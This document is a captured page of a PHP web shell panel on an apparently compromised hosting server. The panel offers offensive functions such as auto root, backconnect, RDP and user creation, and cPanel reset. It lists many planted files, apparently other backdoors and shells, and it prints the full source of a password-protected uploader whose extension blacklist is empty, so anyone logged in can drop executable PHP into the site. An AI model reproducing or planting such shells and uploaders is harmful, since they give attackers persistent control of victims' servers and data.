Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.99
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
wwnova /
public_html /
tudosorte.com.br /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxr-xr-x
.buy.php
579
B
-rw-r--r--
.documentroot.php
280
B
-rw-r--r--
.goods.php
577
B
-rw-r--r--
.wp-esp.php
577
B
-rw-r--r--
0x194945BXRH.php
4.12
KB
-rw-r--r--
0x19495GZCOU.php
4.12
KB
-rw-r--r--
0x1949BIJKKG.php
4.12
KB
-rw-r--r--
0x1949LKGFCR.php
4.12
KB
-rw-r--r--
0x1949Q4FPN1.php
4.12
KB
-rw-r--r--
0x1949RNWM66.php
4.12
KB
-rw-r--r--
Private-MASS-ova.php
19.06
KB
-rw-r--r--
admin.php
209
B
-rw-r--r--
bero.pHtML
44.85
KB
-rw-r--r--
berofc.php
44.85
KB
-rw-r--r--
bw.php
9.51
KB
-rw-r--r--
dataat.pHtML
16
KB
-rw-r--r--
default.xml
402
B
-rw-r--r--
documentroot.php
280
B
-rw-r--r--
error_log
27.57
KB
-rw-r--r--
error_log.pHtML
28.62
KB
-rw-r--r--
error_log.php
28.62
KB
-rw-r--r--
finalkitaya.PHP
6.86
KB
-rw-r--r--
googlef7118cfda07b48b4.html
53
B
-rw-r--r--
index.php
381.47
KB
-rw-r--r--
logssss.pHtML
3.12
KB
-rw-r--r--
modric8BTCHM.php
70.77
KB
-rw-r--r--
modricDHXFVX.php
2.14
KB
-rw-r--r--
modricPNBH8L.php
70.77
KB
-rw-r--r--
modricZW9ITU.php
2.14
KB
-rw-r--r--
perantaraupload.php
6.02
KB
-rw-r--r--
php.ini
40
B
-rw-r--r--
postnews.php
5.72
KB
-r--r--r--
tes110000.pHtML
5.63
KB
-rw-r--r--
uploa.pHtML
6.02
KB
-rw-r--r--
wp-est.php
575
B
-rw-r--r--
wp-ompira.php
577
B
-rw-r--r--
x7.php
278
B
-rw-r--r--
没啥.php
13.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : uploa.pHtML
<?php // ========================== // Secure File Uploader + Login // (versi sudah diperbaiki, tanpa warning session) // ========================== // --- Konfigurasi akun login --- $USERNAME = 'admin'; // Buat hash di terminal dengan: php -r "echo password_hash('SandiRahasia123', PASSWORD_DEFAULT).PHP_EOL;" $PASSWORD_HASH = '$2y$10$9/c3sGlNZHrNS321MFU3DOWqzT3Z9h29l4rAEsBdPRPdBEP.BpaCK'; // --- Konfigurasi session (letakkan SEBELUM session_start) --- if (session_status() === PHP_SESSION_NONE) { // Set konfigurasi aman untuk session @ini_set('session.use_strict_mode', 1); @ini_set('session.cookie_httponly', 1); // Aktifkan baris berikut jika server sudah HTTPS: // @ini_set('session.cookie_secure', 1); session_start(); } // Timeout sesi dalam detik (30 menit) define('SESSION_TIMEOUT', 30 * 60); // ---------- Fungsi utilitas ---------- function is_logged_in() { if (empty($_SESSION['logged_in']) || $_SESSION['logged_in'] !== true) return false; if (!empty($_SESSION['last_activity']) && (time() - $_SESSION['last_activity'] > SESSION_TIMEOUT)) { $_SESSION = []; session_destroy(); return false; } $_SESSION['last_activity'] = time(); return true; } // ---------- Logout ---------- if (isset($_GET['action']) && $_GET['action'] === 'logout') { $_SESSION = []; session_destroy(); header('Location: ' . strtok($_SERVER["REQUEST_URI"], '?')); exit; } // ---------- Login ---------- $login_error = ''; if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['do'] ?? '') === 'login') { $user = trim($_POST['username'] ?? ''); $pass = trim($_POST['password'] ?? ''); if (!isset($_SESSION['attempts'])) $_SESSION['attempts'] = 0; if ($_SESSION['attempts'] >= 5) { $login_error = 'Terlalu banyak percobaan login. Coba lagi nanti.'; } elseif ($user === $USERNAME && password_verify($pass, $PASSWORD_HASH)) { session_regenerate_id(true); $_SESSION['logged_in'] = true; $_SESSION['username'] = $user; $_SESSION['last_activity'] = time(); $_SESSION['attempts'] = 0; if (empty($_SESSION['upload_session_folder'])) { $_SESSION['upload_session_folder'] = bin2hex(random_bytes(8)); } header('Location: ' . strtok($_SERVER["REQUEST_URI"], '?')); exit; } else { $_SESSION['attempts']++; $login_error = 'Username atau password salah.'; } } // ---------- Jika belum login tampilkan form login ---------- if (!is_logged_in()) { ?> <!doctype html> <html> <head><meta charset="utf-8"><title>Login</title></head> <body> <h2>Login</h2> <?php if ($login_error): ?> <p style="color:red;"><?= htmlspecialchars($login_error) ?></p> <?php endif; ?> <form method="post" autocomplete="off"> <input type="hidden" name="do" value="login"> <label>Username: <input name="username" required></label><br><br> <label>Password: <input type="password" name="password" required></label><br><br> <button type="submit">Masuk</button> </form> </body> </html> <?php exit; } // ---------- Sudah login: halaman upload ---------- // Fungsi membuat nama folder acak function generateRandomFolderName($length = 16) { $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; $max = strlen($characters) - 1; $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[random_int(0, $max)]; } return $randomString; } // Direktori utama upload $baseUploadDir = __DIR__ . '/uploads/'; if (!is_dir($baseUploadDir)) mkdir($baseUploadDir, 0755, true); // Tentukan folder sesi login if (empty($_SESSION['upload_session_folder'])) { $_SESSION['upload_session_folder'] = generateRandomFolderName(16); } $sessionFolder = preg_replace('/[^A-Za-z0-9_\-]/', '', $_SESSION['upload_session_folder']); $uploadDir = $baseUploadDir . $sessionFolder . '/'; if (!is_dir($uploadDir)) mkdir($uploadDir, 0755, true); // Proses upload file $msg = ''; if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) { $file = $_FILES['file']; $fileName = basename($file['name']); $fileName = preg_replace('/[^A-Za-z0-9_\-\.]/', '_', $fileName); $targetFile = $uploadDir . $fileName; if ($file['error'] !== UPLOAD_ERR_OK) { $msg = "Error upload (kode {$file['error']})."; } else { $ext = strtolower(pathinfo($fileName, PATHINFO_EXTENSION)); $blacklist = []; if (in_array($ext, $blacklist)) { $msg = 'Tipe file tidak diizinkan.'; } elseif (move_uploaded_file($file['tmp_name'], $targetFile)) { $publicPath = 'uploads/' . rawurlencode($sessionFolder) . '/' . rawurlencode($fileName); $msg = "✅ File berhasil di-upload: <a href=\"{$publicPath}\" target=\"_blank\">{$fileName}</a>"; } else { $msg = "Gagal memindahkan file."; } } } ?> <!doctype html> <html> <head> <meta charset="utf-8"> <title>Secure PHP File Uploader</title> </head> <body> <h2>Upload File (Login sebagai: <?= htmlspecialchars($_SESSION['username']) ?>)</h2> <p><a href="?action=logout">Logout</a></p> <?php if ($msg): ?><p><?= $msg ?></p><?php endif; ?> <form action="" method="post" enctype="multipart/form-data"> <input type="file" name="file" required> <button type="submit">Upload</button> </form> <hr> <p>Folder upload sesi ini: <strong><?= htmlspecialchars($sessionFolder) ?></strong></p> <h3>Daftar file</h3> <ul> <?php $files = array_diff(scandir($uploadDir), ['.','..']); foreach ($files as $f) { $path = $uploadDir . $f; if (is_file($path)) { $url = 'uploads/' . rawurlencode($sessionFolder) . '/' . rawurlencode($f); echo "<li><a href=\"$url\" target=\"_blank\">" . htmlspecialchars($f) . "</a> (" . number_format(filesize($path)) . " bytes)</li>"; } } ?> </ul> </body> </html>
Close
